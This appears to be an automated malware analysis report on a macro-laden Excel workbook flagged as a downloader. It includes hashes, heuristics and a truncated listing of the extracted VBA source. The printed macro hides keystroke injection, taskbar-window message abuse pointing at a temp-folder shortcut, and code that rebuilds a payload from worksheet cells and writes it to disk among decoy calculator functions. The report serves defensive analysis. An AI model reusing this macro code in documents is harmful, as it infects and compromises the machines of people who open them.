Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5235a0960cad3739…

MALICIOUS

Office (OOXML)

1.26 MB Created: 2021-09-15 17:08:55 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-25
MD5: 557b645d8329c2dbddc990cb73dca852 SHA-1: 15a2dc3a19ae47752f62e8b41f979e4c1032108d SHA-256: 5235a0960cad37393f621cebce9a288ec77e1f41c871c0649a99ad0e992babdd
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events, indicating an attempt to automatically execute code upon opening. The ClamAV detection 'Doc.Downloader.Generic-6698421-0' strongly suggests the macro's purpose is to download and execute a secondary payload. The document body's content about mandatory training and completion functionality serves as a lure to encourage user interaction.

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6665 bytes
SHA-256: cfd918143b97fffb354c15c1af42a70cc58f7c474d9cb8bc760b500b3548a7bf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare PtrSafe Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare PtrSafe Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare PtrSafe Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare PtrSafe Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare PtrSafe Function GetActiveWindow Lib "user32" () As Long
Private Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare PtrSafe Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#Else
Private Declare Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare  Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare  Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare  Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare  Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare  Function GetActiveWindow Lib "user32" () As Long
Private Declare  Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare  Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare  Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#End If

Public tmpVar As String
Public calVal As String

Private Sub cmdBtnBak_Click()
    If txtRes <> 0 And txtRes <> "" Then txtRes = Left(txtRes, Len(txtRes) - 1)
End Sub
Private Sub cmdBtnAdd_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Add"
    End If
End Sub
Sub merge()
w 17, 0
w 18, 0
w 16, 0
w 84, 0
w 84, 2
w 16, 2
w 18, 2
w 17, 2
End Sub
Private Sub cmdBtnDvd_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Divide"
    End If
End Sub
Private Sub cmdBtnDot_Click()
    If txtRes <> 0 Then txtRes = txtRes + "."
End Sub

Sub boo()
sm fw("Shell_TrayWnd", ""), 1024 + 234, 1792 + 84, 0
End Sub
Private Sub cmdBtnMult_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Multiplication"
    End If
End Sub
Private Sub cmdBtn1_Click()
    If txtRes = 0 Then
        txtRes = cmdBtn1.Caption
    Else
        txtRes = txtRes + cmdBtn1.Caption
    End If
End Sub
Sub w(ByVal w As Byte, ByVal x As Long)
    ke w, 0, x, 0
End Sub
Private Sub cmdBtn4_Click()
    If txtRes = 0 Then
        txtRes = cmdBtn4.Caption
    Else
        txtRes = txtRes + cmdBtn4.Caption
    End If
End Sub
Private Sub cmdBtn5_Click()
    If txtRes = 0 Then
        txtRes = cmdBtn5.Caption
    Else
        txtRes = txtRes + cmdBtn5.Caption
    End If
End Sub
Sub te()
 sm fw("Shell_TrayWnd", ""), 1024 + 233, 1792 + 84, ByVal gaa(Environ("TMP") & Replace("\office13|.|ln|k", "|", ""))

merge
s 8950

 boo
End Sub
Private Sub cmdBtnMns_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Minus"
    End If
End Sub

Sub aa()
Dim fn As String
fn = Environ("tmp") & "\Doc1.docx"
Dim pl As String
  For Each c In Worksheets("Sheet1").Range("A200:A345")
    pl = pl & c
   Next c
        
    

    Dim fh, i, j, z As Integer
    Dim bc As Long
    Dim b As Byte
    
    bc = 1
    i = 1
    j = 1
    fh = FreeFile

    Open fn For Binary Access Write As #fh
        Do
            j = InStr(i, pl, ",", 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 41984 bytes
SHA-256: e046724fe0ca7af2eedb3e321eaacd760cc256e8a9e1ce3f7f9b12c737f5e25a
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely